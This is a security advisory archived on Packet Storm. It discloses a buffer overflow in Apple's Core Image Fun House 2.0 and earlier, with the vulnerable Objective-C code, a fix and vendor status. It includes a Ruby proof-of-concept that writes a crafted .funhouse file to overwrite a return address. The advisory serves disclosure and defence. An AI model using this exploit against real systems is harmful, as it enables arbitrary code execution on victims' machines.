exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netragard Security Advisory 2007-06-28

Netragard Security Advisory 2007-06-28
Posted Jul 11, 2008
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Core Image Fun House versions 2.0 and below for OS X suffer from a buffer overflow vulnerability when a specially crafted .funhouse file is leveraged. Proof of concept code included.

tags | exploit, overflow, proof of concept
systems | apple, osx
SHA-256 | 6c6bce17e27550c78e31772953580b27edbf6c06eb465a112c51012482a46cac

Netragard Security Advisory 2007-06-28

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

*************************** NETRAGARD ADVISORY ***********************
http://www.netragard.com
"We make IT Safe"


[Advisory Summary]
- ----------------------------------------------------------------------
Advisory Author : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070628
Product Name : Core Image Fun House
Product Version : <= 2.0 OS X
Vendor Name : http://www.apple.com
Type of Vulnerability : Buffer Overflow
Effort (1-10 where 1 == easy) : 5
Impact : Arbitrary Code Execution
Vendor Notified : Yes
Patch Released : N/A
Discovery Date : 07/10/2007




[POSTING NOTICE]
- ----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com as the contents of
this advisory may be updated without notice.





[Product Description]
- ----------------------------------------------------------------------
"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects, Core Image
performs the heavy lifting that enables the next generation of imaging
applications."

- -- http://developer.apple.com/macosx/coreimage.html --





[Technical Summary]
- ----------------------------------------------------------------------
It is possible to trigger an exploitable buffer overflow condition
by creating a specially crafted .funhouse file.





[Technical Details]
- ----------------------------------------------------------------------
The Funhouse application does not properly parse XML data.
Specifically it is possible to create a specially crafted .funhouse
file that will trigger and exploit a buffer overflow condition. The
code responsible for the condition is as follows:

// render origin handles using AppKit directly
- - (CIImage *)drawPoints:(CIImage *)im
{
...
~ NSString *str, *str2, *localizedParameter;
...

~ else if ([type isEqualToString:@"image"])
~ {
~ // image effect stack element
~ // show an image origin (in its center)
~ CGRect r = [[es imageAtIndex:i] extent];
~ NSPoint offset = [es offsetAtIndex:i];
~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
~ str = [[es filenameAtIndex:i] stringByAppendingString:@"
center"];
~ [self drawPoint:pt label:str intoContext:cg];
~ }

}

The following code is called by the code referenced above:

/*
~ Drawing
*/

// draw an onscreen handle for an image origin, text origin, or filter point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- - (void)drawPoint:(NSPoint)pt label:(NSString *)str
intoContext:(CGContextRef)cg
{
...
~ char cstr[256];
...
~ if (!movingNow)
~ {
~ [str getCString:cstr]; <-- Vulnerability Exists Here


[Fix]
- ----------------------------------------------------------------------
To fix the issue the [str getCString:cstr]; needs to be replaced with
[str getCString:cstr maxLength:254]; to prevent overflows.


- - [str getCString:cstr];
+ [str getCString:cstr maxLength:254];


[Proof Of Concept]
- ----------------------------------------------------------------------
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8

len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!

if File.exist?(fname + ".funhouse/file.xml")
File.unlink(fname + ".funhouse/file.xml")
Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~ f.print(FUNSTUFF) # weeeeee... lets have fun.
~ f.close
}



[Vendor Status]
- ----------------------------------------------------------------------
Vendor Notified





[Vendor Comments]
- ----------------------------------------------------------------------
This issue is addressed in Xcode tools 3.1. Credit to Kevin
Finisterre of Netragard for reporting this issue to Apple. Further
information is available at:

http://support.apple.com/kb/HT1222




[Disclaimer]
- ----------------------http://www.netragard.com------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>


[Netragard Whitepaper Downloads]
- ----------------------------------------------------------------------
Choosing the right provider : http://tinyurl.com/2ahk3j
Three Things you must know : http://tinyurl.com/26pjsn








-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFId6ijQwbn1P9Iaa0RAoLpAJ94J7P/GGI+fr4P3UlORkG7v6xWEwCePG6n
Tk3RLUnGHHdl6WHLzaoY07U=
=MJZy
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    17 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close